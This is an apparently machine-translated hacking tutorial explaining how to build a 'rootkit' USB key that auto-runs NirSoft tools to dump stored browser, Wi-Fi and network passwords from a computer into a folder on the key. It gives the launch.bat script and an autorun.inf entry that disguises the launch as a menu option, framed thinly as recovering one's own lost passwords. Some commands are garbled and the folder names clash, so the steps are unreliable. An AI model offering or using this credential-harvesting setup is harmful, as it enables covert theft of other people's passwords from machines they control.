TUTO HACK: Creating a rootkit USB key

usb rookit

Dernière mise à jour: 7 mai 2022

Today we are going to see how to create a USB key which recovers passwords from a computer. This USB key runs automatically and recovers most passwords store on a computer.

It is really very useful especially when you have lost your Passwords.

To create a rootkit USB key, follow the steps below:

Step 1

We will first download some tools that allow us to recover the passwords of the most common applications. All these applications come from the Nirsoft site (http://www.nirsoft.net/).

Next, we are going to place all the .exe files on our USB key.

Step 2

Now you have to create a file launch.bat which will automatically open the password recovery programs and it will store the results in a text file.
For this, we must create a new text document with notepad or other and write the code below.

@ Echo off
start WebBrowserPassView.exe / stext folder1 / WebBrowserPassView.txt
start WirelessKeyView.exe / stext folder1 / WirelessKeyView.txt
start netpass.exe / stext folder1 / netpass.txt

Be careful to check that the names of the tools correspond to the names that are written in the file launch.bat .
At this stage, when launch.bat will be executed, these logs will be sent to a folder called dossier1. We must therefore create a new folder and name it dossier1.

Step 3

Then we will create the file autorun.inf. The autorun.inf file is a text file saved at the root of a storage device (DVD, USB key, etc.) allowing the automatic launch of certain programs when inserting a storage device.
When you insert your USB key usually a window appears asking us what we want to do!
In this window, we are going to create a new option that will allow us (once we have clicked on it) to recover passwords from the computer and stored in the folder created in step 2.
To achieve this, open a new text document and insert the following code:

open = launch.bat
ACTION = 'The name of the new option'

Finally, save the file autorun.inf.

Congratulations ! Your usb rootkit is now ready to use, all you have to do is test it.

Note: AutoRun is no longer available on Windows 7 and Windows 10. With the progression of viruses exploiting the AutoRun feature to install themselves, Microsoft has decided to remove it from Windows 7 and 10 when connecting USB media to a PC.
So to recover passwords for a computer running Windows 7 or Windows 10, you have to click manually on the small program Launch.bat.